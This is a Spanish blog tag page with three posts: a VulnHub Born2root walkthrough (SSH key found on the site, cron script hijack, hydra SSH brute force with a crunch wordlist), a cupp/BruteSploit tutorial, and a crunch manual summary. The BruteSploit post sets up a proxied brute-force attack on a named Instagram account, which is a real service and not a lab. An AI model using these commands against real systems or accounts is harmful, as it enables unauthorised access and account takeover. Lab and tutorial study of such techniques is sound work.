Mostrando entradas con la etiqueta crunch. Mostrar todas las entradas
Mostrando entradas con la etiqueta crunch. Mostrar todas las entradas

sábado, 21 de abril de 2018

Solución al reto Born2root

Hola amigos.

Hoy, vamos a ver cómo podemos resolver el reto born2root, descargable en https://www.vulnhub.com/entry/born2root-1,197/#

La dirección de la máquina víctima será 192.168.1.70

En primer lugar, escaneamos los puertos y vemos los servicios:

nmap -sS -sV -O 192.168.1.70



Bien, veamos la página web



Vemos que el correo de uno de ellos es martin@secretsec.com. Bien, eso significa, que los usuarios es posible que sean martin, hadi y jimmy.

Estudiaremos los directorios de la página web.





en el directorio /icons nos encontramos lo siguiente:



Nos llama la atención el fichero VDSoyuAXiO.txt. 

Nos lo descargamos.

Ponemos

chmod 600 VDSoyAXiO.txt

porque si no, nos saldrá un error como se muestra a continuación:



ssh -i VDSoyuAXiO.txt martin@192.168.1.70

(probamos martin por probar, si no lo fuese, serían o hadi o jimmy)



Introducimos cualquier contraseña



Si ponemos

nano /etc/crontab




/etc/crontab es un archivo que indica al sistema tareas que realizar automáticamente. Es decir, le puedes programar que, por ejemplo, todos los lunes, a las 17:30, haga algo.

Vemos que, cada cinco minutos, se ejecuta el script /tmp/sekurity.py para el usuario jimmy. ¿Y si cambiamos ese script por otro que sea nuestro?

Crearemos un script en python

nano /tmp/sekurity.py

Y ponemos:

import os
os.system(“chmod 777 -R /home/jimmy”)

guardamos y cerramos.

Con este código, tendremos permisos en el directorio /home/jimmy

chmod es el encargado de dar permisos en linux:
  • Permiso de lectura: 4
  • Permiso de escritura: 2
  • Permiso de ejecución: 1
Como queremos todos los permisos, 4+2+1 =7

Y ponemos un 7 para el usuario, un 7 para el grupo, y un 7 para el resto, con lo cual nos queda chmod 777

Ahora, ponemos un -R para indicar que se va a aplicar a todos los archivos y subcarpetas de /home/jimmy

Guardamos y cerramos.

Esperamos 5 minutos.



Y ya podemos entrar en el directorio de jimmy.
 
Vamos a preparar un diccionario para hadi.

En otra ventana ponemos

crunch 5 5 -t hadi% > hadi1.txt

crunch 6 6 -t hadi%% > hadi2.txt

crunch 7 7 -t hadi%%% > hadi3.txt

Unimos los archivos (concatenamos) de la siguiente manera:

cat hadi*.txt > hadi.txt

Y ya tenemos un diccionario de los tres anteriores.

Ahora, usamos la fuerza bruta.

hydra -l hadi -P hadi.txt 192.168.1.70 ssh



Iniciamos sesión


Y como contraseña hadi123




Probamos

su

Cuando pida la contraseña ponemos hadi123



Resulta que hadi es el administrador.

Y si vamos al directorio /root/, nos encontramos la flag.txt

cat flag.txt


viernes, 9 de marzo de 2018

Tutorial Cupp y Brutesploit

Hola amigos.

Hoy vamos ver las herramientas cupp y brutesploit.

Cupp es un script que nos va a ayudar a crear un diccionario de conocimiento para después hacer fuerza bruta.

Y en este caso, veremos cómo hacer fuerza bruta con bruesploit.

Dos posts en uno.

En primer lugar, nos descargamos cupp, lo podemos hacer por

apt-get install cupp

o a través de su repositorio en github:


Tendremos varias opciones

-i Inicia el modo interactivo.
-w Usa un diccionario ya existente.
-l Descarga diccionarios del repositorio
-a Usa usuarios y contraseñas de AlectoDB

El archivo cupp.cfg es el fichero de configuración, en el que podemos cambiar las combinaciones de la generación de diccionarios.



Ahora, instalaremos brutesploit


Nos metemos en el directorio BruteSploit

cd BruteSploit

Asignamos permisos de ejecución

chmod +x Brutesploit

Ejecutamos

./Brutesploit



El programa va por módulos. Para mostrarlos usaremos

show modules

Por ejemplo, vamos a realizar un ataque para instagram:

list 0e



use 0e4



show options



Configuramos las distintas opciones con set

set username manugomez1977

set wordlist /root/cupp/alfonso.txt

Para el proxy, abrimos en otra terminal y ponemos

nano /root/proxys.txt

Y ponemos una lista de proxys en formato

ip:port

Podéis encontrar listas de proxys anonimos en https://hidemy.name/es

Guardaremos, cerraremos y, en la terminal de BruteSploit

set proxy /root/proxys.txt

set threads 5

run






viernes, 11 de agosto de 2017

Tutorial crunch

Hola amigos.

En esta ocasión aprenderemos a crear diccionarios con una aplicación que ya nos trae Kali (o Parrot OS, …), la cual tiene el nombre de crunch.

Voy a casi traducir lo que viene en el manual.

La sintaxis es la siguiente

crunch <min> <max> [charset] [options]

min indica el número mínimo de caracteres que tendrán nuestras palabras.

max indica el número máximo.

Charset es la configuración de caracteres que queremos usar. Por defecto es lalpha (lower alphabet). Se utilizaría la \ para escapar (poder utilizar caracteres como el punto, el %...) en nuestro diccionario. Es precedido por -f

Opciones:

-b Tamaño en Mb del fichero que queremos crear. Sólo trabaja con -o

-c Numero de líneas que tendrá nuestro fichero.

-d Limita el número de símbolos, por ejemplo, si ponemos -d 2@ (más adelante veremos lo de @) generará aab aac aad … pero nunca aaa.

-e Cuando pongamos una palabra tras el -e, crunch terminará de ejecutarse.

-f Selecciona el tipo de carácter del archivo charset.lst

-i Invierte la salida, por ejemplo aaa aab aac … lo pasa a aaa baa caa …

-l Especifica qué símbolos aparecerán literalmente. Se usa conjuntamente con -t

-m Es lo mismo que -p

-o El diccionario lo guarda en el fichero señalado, por ejemplo -o mi_diccionario.txt

-p permuta los caracteres. Los puedes pasar directamente (-p juan pedro filete, que daría juanpedrofilete, filetejuanpedro, pedrofiletejuan, ...)

-q Igual que antes, pero a través de un archivo con las palabras a permutar (-p archivo)

-r Funciona sólo con -o. Reanuda la generación de palabras desde donde se dejó. Debes usar el mismo comando que utilizaste por primera vez. Eso sí, en el caso de que hubieses creado la lista con la opción -s, no habría que poner (el -s).

-s Se usa como -s cadena . Es la cadena desde donde empezará a generar palabras.

-t patrón. El patrón consta de

  • @ caracteres en minúscula
  • , caracteres en mayúscula.
  • % números
  • ^ símbolos
Por ejemplo: @@god@@@ genera aagodaaa aagodaab

-u No imprime el porcentaje de impresión.

-z Esta opción comprime la salida, los porcentajes de compresión que permite son:

-z gzip
-z bzip 2
-z lzma
-z 7z
crunch 9 9 0123456789 91%%%%%%%%%%

91000000000
91000000001
…